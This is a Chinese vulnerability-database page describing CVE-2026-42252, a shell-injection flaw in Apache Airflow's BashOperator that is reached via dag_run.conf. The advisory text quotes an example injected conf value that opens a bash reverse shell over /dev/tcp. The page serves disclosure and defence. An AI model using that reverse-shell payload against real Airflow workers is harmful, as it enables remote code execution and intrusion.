目标达成 感谢每一位支持者 — 我们达成了 100% 目标!

目标: 1000 元 · 已筹: 1310

100%

CVE-2026-42252— Apache Airflow BashOperator Jinja2注入漏洞

AI 预测 9.1 利用难度: 较易
获取后续新漏洞提醒登录后订阅

一、 漏洞 CVE-2026-42252 基础信息

漏洞信息

对漏洞内容有疑问?看看神龙的深度分析是否有帮助!
查看神龙十问 ↗

尽管我们使用了先进的大模型技术,但其输出仍可能包含不准确或过时的信息。神龙努力确保数据的准确性,但请您根据实际情况进行核实和判断。

Vulnerability Title
Apache Airflow: BashOperator Jinja2 injection via dag_run.conf — low-privilege user pattern
来源: 美国国家漏洞数据库 NVD
Vulnerability Description
Apache Airflow's official documentation at `core-concepts/dag-run.html` ("Passing Parameters when triggering Dags") showed a verbatim `BashOperator(bash_command="echo value: {{ dag_run.conf['conf1'] }}")` example without any quoting / sanitization warning. Dag authors who copied the pattern verbatim into deployments where users had `Dag.can_trigger` permission on the affected Dag (typical multi-team deployments, hosted offerings exposing a trigger API) could be exposed to shell-metacharacter injection via the `conf` field of the trigger API: an authenticated trigger user could supply `"; bash -i >& /dev/tcp/.../9999 0>&1; #"` as a `conf` value and reach an `os.exec` on the worker. This CVE covers the documentation correction in `apache/airflow` PR 64129 — the pattern in the docs example now includes explicit shell-quoting and a safety caveat. Affects deployments whose Dag code was modeled on the pre-correction docs example. Same class as the prior CVE-2025-50213 and CVE-2025-27018 documentation-pattern fixes. Users are advised to upgrade to `apache-airflow` 3.2.2 or later to pick up the corrected documentation shipped with the release.
来源: 美国国家漏洞数据库 NVD
CVSS Information
N/A
来源: 美国国家漏洞数据库 NVD
Vulnerability Type
CWE-1336
来源: 美国国家漏洞数据库 NVD

受影响产品

厂商产品影响版本CPE订阅
Apache Software FoundationApache Airflow 3.0.0 ~ 3.2.2 -

二、漏洞 CVE-2026-42252 的公开POC

#POC 描述源链接神龙链接
AI 生成 POC高级

未找到公开 POC。

登录以生成 AI POC

三、漏洞 CVE-2026-42252 的情报信息

登录查看更多情报信息。

CVE-2026-42252 邮件列表归档 (1)

同批安全公告 · Apache Software Foundation · 2026-06-01 · 共 28 条

CVE-2026-448258.1 HIGHApache Solr BasicAuth启用导致不安全用户
CVE-2026-488277.1 HIGHApache MINA SSHD sshd-git 路径遍历漏洞
CVE-2026-45192Apache Airflow 连接API敏感字段未完整隐藏漏洞
CVE-2026-49328Apache Fesod 用户输入URL验证不当导致SSRF漏洞
CVE-2026-35563Apache Directory LDAP API 证书主机名验证漏洞
CVE-2026-49270Apache ActiveMQ 通过OpenWire泄露持久订阅信息漏洞
CVE-2026-49157Apache ActiveMQ 默认允许低权限Web用户通过Jolokia管理Broker
CVE-2026-46605Apache ActiveMQ 目的地删除时授权不完整漏洞
CVE-2026-45505Apache ActiveMQ Jolokia添加网络连接器发现包装器绕过
CVE-2026-42588Apache ActiveMQ Jolokia远程代码执行漏洞
CVE-2026-42253Apache ActiveMQ JMS消息属性导致HTTP响应头注入漏洞
CVE-2026-49298Apache Airflow KubernetesExecutor命令参数JWT令牌暴露漏洞
CVE-2026-48726Apache Airflow 认证管理器注销路径中 revoke_token 不可达
CVE-2026-46764Apache Airflow DAG范围事件日志权限绕过
CVE-2026-45426Apache Airflow日志服务器JWT授权绕过漏洞
CVE-2026-45360Apache Airflow 自定义反序列化任意导入漏洞
CVE-2026-42359Apache Airflow XCom PATCH端点远程代码执行漏洞
CVE-2026-42358Apache Airflow 变量掩码深度限制绕过导致密文泄露
CVE-2026-42360Apache Airflow 渲染模板截断绕过嵌套密钥掩码
CVE-2026-41084Apache Airflow API 授权绕过,跨DAG批量任务实例

显示前 20 条,共 28 条。 查看全部 → →

IV. Related Vulnerabilities

V. Comments for CVE-2026-42252

暂无评论


发表评论